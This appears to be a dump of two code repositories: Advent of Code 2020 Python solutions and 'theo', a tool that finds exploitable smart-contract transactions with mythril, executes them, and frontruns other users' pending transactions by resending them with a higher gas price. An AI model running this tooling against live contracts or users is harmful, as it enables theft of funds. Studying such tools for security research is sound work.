"content_id": "008212a89a88dc2ffe072140bccedfd258de10a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 888,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 25,
"path": "/day1.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\ndef find_two_that_sum(input, target):\n for v in input:\n other_value = target - v\n try:\n input.index(other_value) \n print(\"target=%d v=%s product=%d\" % (target, (v, other_value), v * other_value))\n return\n except:\n pass\n\ndef find_three_that_sum(input, target):\n for i in range(0, len(input)):\n for j in range(i+1, len(input)):\n for k in range(j+1, len(input)):\n sum = input[i] + input[j] + input[k]\n if sum == target:\n prod = input[i] * input[j] * input[k]\n print(\"target=%d v=%s product=%d\" % (target, (input[i], input[j], input[k]), prod))\n return\n \ninput = sorted([int(x) for x in open(\"day1.txt\", \"r\").readlines()])\nfind_two_that_sum(input, 2020)\nfind_three_that_sum(input, 2020)"
},
{
"alpha_fraction": 0.492704838514328,
"alphanum_fraction": 0.5129068493843079,
"avg_line_length": 27.30158805847168,
"blob_id": "8c3c425eda2e7f8295186aea6b9e186f223426c6",
"content_id": "c5ab9d8ec4d746bfc6e0f939ba1a0fea9910d049",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1782,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 63,
"path": "/day8.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport copy\n\ndef run_failed_acc_value():\n idx = 0\n global_acc = 0\n while True:\n if idx == len(instructions): break\n if instructions[idx][2] == 1:\n print(\"global_acc\", global_acc)\n break\n instructions[idx][2] += 1\n if instructions[idx][0] == \"nop\":\n idx += 1\n elif instructions[idx][0] == \"jmp\":\n idx += instructions[idx][1]\n elif instructions[idx][0] == \"acc\":\n global_acc += instructions[idx][1]\n idx += 1\n\ndef run_program(instructions):\n idx = 0\n global_acc = 0\n while True:\n if idx == len(instructions):\n print(\"global_acc\", global_acc)\n return True\n if instructions[idx][2] == 1:\n return False\n instructions[idx][2] += 1\n if instructions[idx][0] == \"nop\":\n idx += 1\n elif instructions[idx][0] == \"jmp\":\n idx += instructions[idx][1]\n elif instructions[idx][0] == \"acc\":\n global_acc += instructions[idx][1]\n idx += 1\n\ndef part2():\n idx = 0\n while True:\n my_instructions = copy.deepcopy(instructions)\n if my_instructions[idx][0] == \"nop\":\n my_instructions[idx][0] = \"jmp\"\n if run_program(my_instructions):\n print(\"success\")\n break\n elif my_instructions[idx][0] == \"jmp\":\n my_instructions[idx][0] = \"nop\"\n if run_program(my_instructions):\n print(\"success\")\n break\n idx += 1\n\nlines = [x.strip() for x in open('day8.txt', 'r').readlines()]\n\ninstructions = []\nfor line in lines:\n instruction, value = line.split()\n instructions.append([instruction, int(value), 0])\n\npart2()"
},
{
"alpha_fraction": 0.6317829489707947,
"alphanum_fraction": 0.6459948420524597,
"avg_line_length": 34.181819915771484,
"blob_id": "a885891e09460463880537ad5eea8b644f035f9f",
"content_id": "060da1d4f71ed357af2b579ed6cb9b20930b08e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 774,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 22,
"path": "/day2.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\ndef is_password_valid(line):\n num_times, symbol, password = line.split()\n symbol = symbol[:-1]\n minn, maxn = [int(x) for x in num_times.split(\"-\")]\n num_symbols_in_password = password.count(symbol)\n return num_symbols_in_password >= minn and num_symbols_in_password <= maxn\n\ndef is_password_valid2(line):\n num_times, symbol, password = line.split()\n symbol = symbol[:-1]\n minn, maxn = [int(x) for x in num_times.split(\"-\")]\n return (password[minn-1] == symbol or password[maxn-1] == symbol) and not (password[minn-1] == symbol and password[maxn-1] == symbol)\n\nlines = open(\"day2.txt\", \"r\").readlines()\n\nnum_valid = 0\nfor line in lines:\n if is_password_valid2(line):\n num_valid += 1\nprint(\"num valid: \", num_valid)\n"
},
{
"alpha_fraction": 0.6147443652153015,
"alphanum_fraction": 0.626634955406189,
"avg_line_length": 23.764705657958984,
"blob_id": "b129ebc32d0c36b8e1350ed659b8871efea9b0cf",
"content_id": "20ebe5e34675861075e981e35ea811c5256d3876",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 841,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 34,
"path": "/day6.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\ndef group_answered_yes2(group):\n answered_yes = []\n for person in group: \n answered_yes.append(set(person))\n\n if len(answered_yes) == 1:\n return len(answered_yes[0])\n\n a = answered_yes[0].intersection(*answered_yes[1:])\n return len(a)\n\ndef group_answered_yes(group):\n answered_yes = set()\n for person in group: \n for q in person:\n answered_yes.add(q)\n return len(answered_yes)\n\nlines = open(\"day6.txt\", \"r\").readlines()\nnum_valid_records = 0\ncurrent_group = []\nnum_answered = 0\nfor line in lines:\n line = line.strip()\n if line == \"\":\n num_answered += group_answered_yes2(current_group)\n current_group = []\n continue\n current_group.append(line)\n\nnum_answered += group_answered_yes2(current_group)\nprint(\"num_answered:\", num_answered)"
},
{
"alpha_fraction": 0.5346938967704773,
"alphanum_fraction": 0.5401360392570496,
"avg_line_length": 29,
"blob_id": "a1e0b700953347d9e86ed7d284d53bdf813af872",
"content_id": "403592bf0ed04608f2b32cb6e7fa73d7b235a2e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1470,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 49,
"path": "/day7.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport re\n\nlines = [x.strip() for x in open('day7.txt', 'r').readlines()]\n\nmapping = dict()\nfor line in lines:\n root_bag = re.search(r'(\\w+ \\w+) bags contain', line)[1]\n sub_bags = re.findall(r'(\\d+) (\\w+ \\w+) bag', line)\n if not root_bag in mapping:\n mapping[root_bag] = dict([(b[1], int(b[0])) for b in sub_bags])\n\ndef find_shiny_gold():\n def find_shiny_gold_helper(mapping, keys, path, ret):\n for k in keys:\n if k == 'shiny gold':\n ret.append(tuple(path))\n else:\n path.append(k)\n find_shiny_gold_helper(mapping, mapping[k].keys(), path, ret)\n path.remove(k)\n s = set()\n for m in mapping:\n ret = []\n find_shiny_gold_helper(mapping, mapping[m].keys(), [m], ret)\n for path in ret:\n for bag in path:\n s.add(bag)\n return len(s)\n\n\ndef shiny_gold_contains():\n def shiny_gold_contains_helper(mapping, sub_bags):\n if len(sub_bags) == 0: \n return 0\n total = 0\n for bag in sub_bags:\n child_bags = shiny_gold_contains_helper(mapping, mapping[bag])\n if child_bags > 0:\n total += (sub_bags[bag] + sub_bags[bag] * child_bags)\n else:\n total += sub_bags[bag] \n return total\n\n return shiny_gold_contains_helper(mapping, mapping['shiny gold'])\n \nprint(find_shiny_gold())\nprint(shiny_gold_contains())\n"
},
{
"alpha_fraction": 0.5147162079811096,
"alphanum_fraction": 0.5311843156814575,
"avg_line_length": 25.165138244628906,
"blob_id": "15e582e5c422b11149eec35d3b2ed43026efbf9e",
"content_id": "bce5b2c5691f7f73711956ded4f5426b88b4d0f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2854,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 109,
"path": "/day11.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport copy\n\ndef get_neighbor_status(lines, row, column):\n ret = {}\n if column == 0:\n ret[\"left\"] = None\n else:\n ret[\"left\"] = lines[row][column-1]\n\n if row == 0:\n ret[\"up\"] = None\n else:\n ret[\"up\"] = lines[row-1][column]\n\n if column == len(lines[row])-1:\n ret[\"right\"] = None\n else:\n ret[\"right\"] = lines[row][column+1]\n\n if row == len(lines)-1:\n ret[\"down\"] = None\n else:\n ret[\"down\"] = lines[row+1][column]\n\n has_uldiag = column > 0 and row > 0\n if not has_uldiag:\n ret[\"uldiag\"] = None\n else:\n ret[\"uldiag\"] = lines[row-1][column-1] \n\n has_urdiag = column < len(lines[row])-1 and row > 0\n if not has_urdiag:\n ret[\"urdiag\"] = None\n else:\n ret[\"urdiag\"] = lines[row-1][column+1] \n\n has_lldiag = row < len(lines)-1 and column > 0 \n if not has_lldiag:\n ret[\"lldiag\"] = None\n else:\n ret[\"lldiag\"] = lines[row+1][column-1] \n\n has_lrdiag = column < len(lines[row])-1 and row < len(lines)-1\n if not has_lrdiag:\n ret[\"lrdiag\"] = None\n else:\n ret[\"lrdiag\"] = lines[row+1][column+1] \n\n return ret\n\ndef occupied_on(inp, outp, row, column):\n neighbors = get_neighbor_status(inp, row, column)\n can_sit = len([n for n in neighbors.values() if n in ('L', '.', None)]) == 8\n if can_sit:\n outp[row][column] = \"#\"\n return can_sit\n\ndef empty_on(inp, outp, row, column):\n neighbors = get_neighbor_status(inp, row, column)\n empty = inp[row][column] == \"#\" and len([n for n in neighbors.values() if n in ('#', )]) >= 4\n if empty:\n outp[row][column] = \"L\"\n return empty\n\ndef print_board(inp):\n for row in range(0, len(inp)):\n line = \"\".join(inp[row])\n print(line)\n\ndef process_board(inp, outp):\n for row in range(0, len(inp)):\n for column in range(0, len(inp[row])):\n if inp[row][column] == '.': \n continue\n occupied_on(inp, outp, row, column)\n empty_on(inp, outp, row, column)\n\ndef diff_boards(inp0, inp1):\n for row in range(0, len(inp0)):\n for column in range(0, len(inp0[row])):\n if inp0[row][column] != inp1[row][column]:\n return True\n \n return False\n\ndef num_seats_occupied(inp0):\n ret = 0\n for row in range(0, len(inp0)):\n for column in range(0, len(inp0[row])):\n if inp0[row][column] == '#':\n ret += 1\n \n return ret\n\nif __name__ == \"__main__\":\n inp = [list(x.strip()) for x in open('day11.txt', 'r').readlines()]\n output = copy.deepcopy(inp)\n\n while True:\n process_board(inp, output)\n\n if not diff_boards(inp, output):\n print(num_seats_occupied(output))\n break\n\n inp = output\n output = copy.deepcopy(inp)\n\n\n"
},
{
"alpha_fraction": 0.4423503279685974,
"alphanum_fraction": 0.4900221824645996,
"avg_line_length": 20,
"blob_id": "906dafd8c519b77af9ce3144990d63ff84e2afcf",
"content_id": "ba0ef6c8d6fc55c3c59723a5a273a02aff050074",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 902,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 43,
"path": "/day9.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nlines = [int(x.strip()) for x in open('day9.txt', 'r').readlines()]\n\ndef sum_to_90433990():\n for x in range(0, len(lines)):\n res = [lines[x]]\n res_sum = lines[x]\n for y in range(x+1, len(lines)):\n res.append(lines[y])\n res_sum += lines[y]\n if res_sum > 90433990:\n break\n if res_sum == 90433990:\n return res\n return None\n\n\ndef no_sum(idx, v):\n start = idx-25\n end = idx\n\n for x in range(start, end+1):\n for y in range(start+1, end+1):\n if lines[x]+lines[y] == v:\n return True\n \n print(\"does not sum\", v)\n return False\n\ndef find_missing():\n idx = 25 \n while True:\n if idx >= len(lines):\n break\n\n no_sum(idx, lines[idx])\n\n idx += 1\n\nr = sum_to_90433990()\nprint(min(r) + max(r))\nfind_missing()"
},
{
"alpha_fraction": 0.500210165977478,
"alphanum_fraction": 0.5212274193763733,
"avg_line_length": 25.433332443237305,
"blob_id": "4a07c24df89216e44f400e8c6c9405c2e06b00e5",
"content_id": "9c4a7f44bbf6b79830ed288ac35d41c4dd6e1d94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2379,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 90,
"path": "/day4.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport re\n\ndef valid_record(record):\n required_fields = set([\"byr\", \"iyr\", \"eyr\", \"hgt\", \"hcl\", \"ecl\", \"pid\"])\n record_fields = set([x.split(\":\")[0] for x in record.split()])\n for r in record_fields:\n if r == \"cid\": continue\n if r in required_fields:\n required_fields.remove(r)\n\n return len(required_fields) == 0\n\ndef valid_record2(record):\n def validate_byr(v):\n vi = int(v)\n return vi >= 1920 and vi <= 2002\n \n def validate_iyr(v):\n vi = int(v)\n return vi >= 2010 and vi <= 2020\n \n def validate_eyr(v):\n vi = int(v)\n return vi >= 2020 and vi <= 2030\n\n def validate_hgt(v):\n if v.endswith(\"cm\"):\n vi = int(v[:-2])\n return vi >= 150 and vi <= 193\n if v.endswith(\"in\"):\n vi = int(v[:-2])\n return vi >= 59 and vi <= 76\n \n return False\n \n def validate_hcl(v):\n return re.search(\"^#([0-9a-f]{6})$\", v) != None\n \n def validate_ecl(v):\n return v in [\"amb\", \"blu\", \"brn\", \"gry\", \"grn\", \"hzl\", \"oth\"]\n \n def validate_pid(v):\n return re.search(\"^[0-9]{9}$\", v) != None\n\n required_fields = {\n \"byr\": validate_byr,\n \"iyr\": validate_iyr, \n \"eyr\": validate_eyr,\n \"hgt\": validate_hgt,\n \"hcl\": validate_hcl,\n \"ecl\": validate_ecl,\n \"pid\": validate_pid\n }\n record_fields = set([tuple(x.split(\":\")) for x in record.split()])\n validated_fields = set()\n for r, v in record_fields:\n if r == \"cid\": continue\n if r in required_fields:\n if required_fields[r](v):\n validated_fields.add(r)\n else:\n return False\n\n return validated_fields == set(required_fields.keys())\n \ndef split_records(lines):\n ret = []\n current_record = \"\"\n for line in lines:\n line = line.strip()\n if line == '':\n ret.append(current_record.strip())\n current_record = \"\"\n continue\n current_record += \" \" + line\n \n ret.append(current_record.strip())\n return ret\n\nlines = open(\"day4.txt\", \"r\").readlines()\nrecords = split_records(lines)\nnum_valid_records = 0\nfor record in records:\n is_valid = valid_record2(record)\n if valid_record2(record):\n num_valid_records += 1\n\nprint(num_valid_records)\n"
},
{
"alpha_fraction": 0.4826132655143738,
"alphanum_fraction": 0.5100105404853821,
"avg_line_length": 22.75,
"blob_id": "6001606bbcd4d0cce1e42f4eef8c1e806fe3e7f5",
"content_id": "d9ec63dc70330ad78ec8e6e26b2ea2cef7aa0194",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 949,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 40,
"path": "/day5.py",
"repo_name": "genesis32/adventofcode2020",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport math\n\ndef find_seat(d, mn, mx):\n if len(d) == 1:\n if d[0] in set([\"F\", \"L\"]):\n return mn\n if d[0] in set([\"B\", \"R\"]):\n return mx\n\n new_min = 0\n new_max = 0\n\n if d[0] in set([\"F\", \"L\"]):\n new_min = mn\n new_max = mx - int(math.ceil((mx - mn)/2))\n if d[0] in set([\"B\", \"R\"]):\n new_min = mn + int(math.ceil((mx - mn)/2))\n new_max = mx\n \n return find_seat(d[1:], new_min, new_max)\n\nlines = open(\"day5.txt\", \"r\").readlines()\nmax_seatid = -1\nseatids = []\nfor line in lines:\n line = line.strip()\n row = line[:-3]\n column = line[-3:]\n seatid = (find_seat(row, 0, 127) * 8) + find_seat(column, 0, 7)\n seatids.append(seatid)\n max_seatid = max(seatid, max_seatid)\n \nprint(\"max seatid:\", max_seatid)\n\nseatids.sort()\nfor i in range(0, len(seatids)-1):\n if seatids[i] != seatids[i+1]-1:\n print(\"my seat\", seatids[i]+1)"
}
] | 11 |
eniolasonowo/theo
|
https://github.com/eniolasonowo/theo
|
acf7c13a7083f2291fc8b6a5379ac2aced34a7fc
|
a2756e83c9685dda2f6b0a466bd14c03e6e8bc47
|
52cba304232ba4f41460cc28aaa8292633f9b5ed
|
refs/heads/master
| 2022-01-13T17:02:17.102566 | 2019-07-19T10:33:06 | 2019-07-19T10:33:06 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4845857322216034,
"alphanum_fraction": 0.686897873878479,
"avg_line_length": 15.741935729980469,
"blob_id": "c0d92d6a1d62153fb2feba057e5b24b77fb66d5e",
"content_id": "e6de0a0a6ea13e614ee8ab56de5584336e046f63",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1038,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 62,
"path": "/requirements.txt",
"repo_name": "eniolasonowo/theo",
"src_encoding": "UTF-8",
"text": "asn1crypto==0.24.0\nattrdict==2.0.1\ncertifi==2019.6.16\ncffi==1.12.3\nchardet==3.0.4\ncoincurve==12.0.0\ncoloredlogs==10.0\nconfigparser==3.7.4\ncoverage==4.5.3\ncycler==0.10.0\ncytoolz==0.9.0.1\ndictionaries==0.0.1\neth-abi==1.3.0\neth-account==0.3.0\neth-hash==0.2.0\neth-keyfile==0.5.1\neth-keys==0.2.4\neth-rlp==0.1.2\neth-tester==0.1.0b32\neth-typing==2.1.0\neth-utils==1.6.1\nethereum==2.3.2\nethereum-input-decoder==0.2.2\nfuture==0.17.1\nhexbytes==0.2.0\nhumanfriendly==4.18\nidna==2.8\nJinja2==2.10.1\nkiwisolver==1.1.0\nlru-dict==1.1.6\nMarkupSafe==1.1.1\nmatplotlib==3.1.1\nmock==3.0.5\nmythril==0.21.8\nnumpy==1.16.4\nparsimonious==0.8.1\npbkdf2==1.3\npersistent==4.5.0\nplyvel==1.1.0\npy-ecc==1.4.2\npy-flags==1.1.2\npy-solc==3.2.0\npycparser==2.19\npycryptodome==3.8.2\npyethash==0.1.27\npyparsing==2.4.0\npysha3==1.0.2\npython-dateutil==2.8.0\nPyYAML==5.1.1\nrepoze.lru==0.7\nrequests==2.22.0\nrlp==1.1.0\nscrypt==0.8.13\nsemantic-version==2.6.0\nsix==1.12.0\ntoolz==0.9.0\ntransaction==2.4.0\nurllib3==1.25.3\nweb3==4.9.2\nwebsockets==6.0\nz3-solver==4.8.5.0\nzope.interface==4.6.0\n"
},
{
"alpha_fraction": 0.5976207256317139,
"alphanum_fraction": 0.6014695763587952,
"avg_line_length": 28.163265228271484,
"blob_id": "1553245d2ad83bc35c72a5f1384c45118cb8ec44",
"content_id": "94cae88c3c4bc71dcf56c5c14de96405d0b63d81",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2858,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 98,
"path": "/theo/interfaces/cli.py",
"repo_name": "eniolasonowo/theo",
"src_encoding": "UTF-8",
"text": "import argparse\nimport code\nimport json\nfrom theo.server import Server\nfrom theo.scanner import find_exploits\nfrom theo.file import load_file\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Monitor contracts for balance changes or tx pool.\"\n )\n\n # Monitor tx pool\n tx_pool = parser.add_argument_group(\"Monitor transaction pool\")\n tx_pool.add_argument(\n \"--rpc-http\", help=\"Connect to this HTTP RPC\", default=\"http://127.0.0.1:8545\"\n )\n tx_pool.add_argument(\n \"--rpc-ws\", help=\"Connect to this WebSockets RPC\", default=None\n )\n tx_pool.add_argument(\n \"--rpc-ipc\", help=\"Connect to this IPC RPC\", default=None\n )\n tx_pool.add_argument(\"--account\", help=\"Use this account to send transactions from\")\n tx_pool.add_argument(\"--account-pk\", help=\"The account's private key\")\n\n # Contract to monitor\n parser.add_argument(\n \"--contract\", help=\"Contract to monitor\", type=str, metavar=\"ADDRESS\"\n )\n\n # Transactions to frontrun\n tx_monitor = parser.add_argument_group(\"Transactions to wait for\")\n tx_monitor.add_argument(\n \"--txs\",\n choices=[\"mythril\", \"file\"],\n help=\"Choose between: mythril (find transactions automatically with mythril), file (use the transactions specified in a JSON file).\",\n default=\"mythril\",\n )\n tx_monitor.add_argument(\n \"--txs-file\",\n help=\"The file which contains the transactions to frontrun\",\n metavar=\"FILE\",\n )\n\n # Run mode\n parser.add_argument(\n \"run_mode\",\n choices=[\"tx-pool\"],\n help=\"Choose between: balance (not implemented: monitor contract balance changes), tx-pool (if any transactions want to call methods).\",\n )\n\n args = parser.parse_args()\n # print(args.__dict__)\n\n if args.run_mode == \"tx-pool\":\n exec_tx_pool(args)\n\n\ndef exec_tx_pool(args):\n\n # Transactions to frontrun\n if args.txs == \"mythril\":\n print(\n \"Scanning for exploits in contract: {contract}\".format(\n contract=args.contract\n )\n )\n exploits = find_exploits(\n rpcHTTP=args.rpc_http,\n rpcWS=args.rpc_ws,\n rpcIPC=args.rpc_ipc,\n contract=args.contract,\n account=args.account,\n account_pk=args.account_pk,\n )\n if args.txs == \"file\":\n exploits = load_file(\n file=args.txs_file,\n rpcHTTP=args.rpc_http,\n rpcWS=args.rpc_ws,\n rpcIPC=args.rpc_ipc,\n contract=args.contract,\n account=args.account,\n account_pk=args.account_pk,\n )\n\n if len(exploits) == 0:\n print(\"No exploits found\")\n return\n\n print(\"Found exploits(s)\", exploits)\n\n # Start interface\n code.interact(local=locals())\n\n print(\"Shutting down\")\n"
},
{
"alpha_fraction": 0.5038594603538513,
"alphanum_fraction": 0.5129092335700989,
"avg_line_length": 35.47572708129883,
"blob_id": "e0f936c6dbdde51aabbec4165e7ded28efa46c5b",
"content_id": "06f10497a98653e62d3d2600bc4885ddfc7683a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3757,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 103,
"path": "/theo/exploit/exploit.py",
"repo_name": "eniolasonowo/theo",
"src_encoding": "UTF-8",
"text": "from web3 import Web3\nimport time\n\n\nclass Exploit:\n def __init__(self, txs: list, w3: Web3, contract: str, account: str, account_pk: str):\n self.txs = txs\n self.w3 = w3\n self.contract = contract\n self.account = account\n\n self.contract = Web3.toChecksumAddress(contract)\n self.account = Web3.toChecksumAddress(account)\n self.account_private_key = account_pk \n\n def __repr__(self):\n return \"Exploit: (txs={})\".format(self.txs)\n\n def execute(self):\n for tx in self.txs:\n run_tx = {\n \"from\": self.account,\n \"to\": self.contract,\n \"gasPrice\": 10 ** 10, # 10 gwei\n \"gas\": 200000, # should be estimated\n \"value\": tx.tx_data[\"value\"],\n \"data\": tx.tx_data[\"input\"],\n }\n\n receipt = self.send_tx(run_tx)\n\n def frontrun(self, flush=False):\n print(\"Waiting for a victim to reach into the honey jar.\")\n\n # Wait for each tx and frontrun it.\n for tx in self.txs:\n victim_tx = self.wait_for(self.contract, tx, flush=flush)\n\n frontrun_tx = {\n \"from\": self.account,\n \"to\": self.contract,\n \"gasPrice\": hex(victim_tx[\"gasPrice\"] + 1),\n \"data\": victim_tx[\"input\"],\n \"gas\": victim_tx[\"gas\"],\n \"value\": victim_tx[\"value\"],\n }\n\n print(\"Frontrunning with tx: {tx}\".format(tx=frontrun_tx))\n receipt = self.send_tx(frontrun_tx)\n print(\n \"Mined transaction: {tx}\".format(tx=(receipt[\"transactionHash\"].hex()))\n )\n\n def send_tx(self, tx: dict) -> str:\n # Make sure the addresses are checksummed.\n tx[\"from\"] = Web3.toChecksumAddress(tx[\"from\"])\n tx[\"to\"] = Web3.toChecksumAddress(tx[\"to\"])\n tx[\"nonce\"] = self.w3.eth.getTransactionCount(self.account)\n\n signed_tx = self.w3.eth.account.signTransaction(tx, self.account_private_key)\n tx_hash = self.w3.eth.sendRawTransaction(signed_tx.rawTransaction)\n tx_receipt = self.w3.eth.waitForTransactionReceipt(tx_hash, timeout=300)\n\n return tx_receipt\n\n def wait_for(self, contract, tx, flush=False):\n # Setting up filter\n pending_filter = self.w3.eth.filter(\"pending\")\n\n # Ignore existing transactions and wait for new ones\n if flush is True:\n print(\n \"Flushing {} existing transactions.\".format(\n len(pending_filter.get_new_entries())\n )\n )\n\n while True:\n time.sleep(1)\n pending_txs_hashes = pending_filter.get_new_entries()\n print(\"Processing {} transactions.\".format(len(pending_txs_hashes)))\n for hash in pending_txs_hashes:\n pending_tx = self.w3.eth.getTransaction(hash)\n\n # Skip some uninteresting transactions\n if (pending_tx is None) or (pending_tx.get(\"to\") is None):\n continue\n\n # Skip transactions already mined\n if pending_tx.get(\"blockNumber\") is not None:\n continue\n\n if (pending_tx.get(\"to\", str(\"\")).lower() == contract.lower()) and (\n pending_tx.get(\"input\", \"\").lower()\n == tx.tx_data.get(\"input\", \"\").lower()\n ):\n print(\n \"Found pending tx: {tx} from: {sender}.\".format(\n tx=pending_tx.get(\"hash\", b\"0\").hex(),\n sender=pending_tx.get(\"from\"),\n )\n )\n return pending_tx\n"
},
{
"alpha_fraction": 0.5885416865348816,
"alphanum_fraction": 0.5989583134651184,
"avg_line_length": 20.33333396911621,
"blob_id": "71460790d9b8aa5078b03f08fbe54da82a16ce24",
"content_id": "340295524ef8efe4eef0f57902670c7d7b92d0a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 192,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 9,
"path": "/theo/exploit/exploit_item.py",
"repo_name": "eniolasonowo/theo",
"src_encoding": "UTF-8",
"text": "from web3 import Web3\n\n\nclass ExploitItem:\n def __init__(self, tx_data: dict):\n self.tx_data = tx_data\n\n def __repr__(self):\n return \"Transaction: {}\".format(self.tx_data)\n"
},
{
"alpha_fraction": 0.5055031180381775,
"alphanum_fraction": 0.5165094137191772,
"avg_line_length": 26.06382942199707,
"blob_id": "f5e2952722116e1d396121b2fb586ad0e00ce526",
"content_id": "69b09f89b8d38b9badb863c1eb7cce195d7fccdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1272,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 47,
"path": "/theo/file/__init__.py",
"repo_name": "eniolasonowo/theo",
"src_encoding": "UTF-8",
"text": "import json\nfrom web3 import Web3\nfrom theo.exploit.exploit import Exploit\nfrom theo.exploit.exploit_item import ExploitItem\n\n\ndef load_file(file, rpcHTTP=None, rpcWS=None, rpcIPC=None, contract=\"\", account=\"\", account_pk=\"\"):\n with open(file) as f:\n exploit_list = json.load(f)\n\n if rpcIPC is not None:\n print(\"Connecting to IPC: {rpc}.\".format(rpc=rpcIPC))\n w3 = Web3(\n Web3.IPCProvider(rpcIPC)\n )\n elif rpcWS is not None:\n print(\"Connecting to WebSocket: {rpc}.\".format(rpc=rpcWS))\n w3 = Web3(\n Web3.WebsocketProvider(rpcWS)\n )\n else:\n print(\"Connecting to HTTP: {rpc}.\".format(rpc=rpcHTTP))\n w3 = Web3(\n Web3.HTTPProvider(rpcHTTP)\n )\n\n exploits = []\n for exploit in exploit_list:\n txs = []\n for tx in exploit:\n txs.append(\n ExploitItem(\n tx_data={\"input\": tx.get(\"input\", \"0x\"), \"value\": tx.get(\"value\", \"\")}\n )\n )\n\n exploits.append(\n Exploit(\n txs=txs,\n w3=w3,\n contract=contract,\n account=account,\n account_pk=account_pk,\n )\n )\n\n return exploits\n"
},
{
"alpha_fraction": 0.6097561120986938,
"alphanum_fraction": 0.6151761412620544,
"avg_line_length": 27.384614944458008,
"blob_id": "8bc162512a83aaf3250cfe65dd619b1d9790be2f",
"content_id": "08e9f096a7e99e2713f4be8ae7f567e5e1e82583",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1107,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 39,
"path": "/theo/server/__init__.py",
"repo_name": "eniolasonowo/theo",
"src_encoding": "UTF-8",
"text": "from http.server import BaseHTTPRequestHandler, HTTPServer\n\n\ndef MakeHTTPRequestHandler(context):\n class HTTPRequestHandler(BaseHTTPRequestHandler):\n def __init__(self, *args, **kwargs):\n super(HTTPRequestHandler, self).__init__(*args, **kwargs)\n\n def do_GET(self):\n # https://docs.python.org/3.7/library/http.server.html?highlight=basehttprequesthandler#http.server.BaseHTTPRequestHandler\n self.send_response(200)\n self.send_header(\"Content-type\", \"text\")\n self.end_headers()\n\n print(\"Context\", context)\n\n self.wfile.write(bytes(self.path, \"UTF-8\"))\n\n return HTTPRequestHandler\n\n\nclass Server:\n host = None\n port = None\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n\n def start(self):\n handler = MakeHTTPRequestHandler(context={\"server\": \"postgres\"})\n\n httpd = HTTPServer((self.host, self.port), handler)\n\n try:\n httpd = httpd.serve_forever()\n except KeyboardInterrupt:\n httpd.socket.close()\n pass\n"
},
{
"alpha_fraction": 0.5651384592056274,
"alphanum_fraction": 0.5751248002052307,
"avg_line_length": 26.886075973510742,
"blob_id": "9d37b5cb61656f426e0f8625697c952b61f27a52",
"content_id": "8de3c34990dc1e32c85c587af09854c335a231ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2203,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 79,
"path": "/theo/scanner/__init__.py",
"repo_name": "eniolasonowo/theo",
"src_encoding": "UTF-8",
